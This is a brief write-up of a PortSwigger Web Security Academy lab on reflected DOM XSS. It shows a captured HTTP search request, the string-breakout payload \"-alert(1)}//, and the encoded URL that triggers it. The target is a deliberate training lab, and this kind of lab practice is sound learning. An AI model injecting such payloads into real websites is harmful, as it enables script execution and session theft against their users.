Skip to content

chojnowski.it

Port Swigger Reflected DOM XSS

Port Swigger Reflected DOM XSS

Reflected DOM XSS¶

Solution¶

Open the website: https://0a9c00fa043623a381ba980300140003.web-security-academy.net/¶

https://0a9c00fa043623a381ba980300140003.web-security-academy.net/

Input random text in search fields¶

GET /search-results?search=babajaga HTTP/2
Host: 0a9c00fa043623a381ba980300140003.web-security-academy.net
Cookie: session=HUGuxtCek4AJ2luJQW2eA8bQd2H8TPZ7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a9c00fa043623a381ba980300140003.web-security-academy.net/?search=babajaga
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

Input payload: \"-alert(1)}//¶

payload: \"-alert(1)}//
https://0a9c00fa043623a381ba980300140003.web-security-academy.net/?search=%5C%22-alert%281%29%7D%2F%2F

Solved¶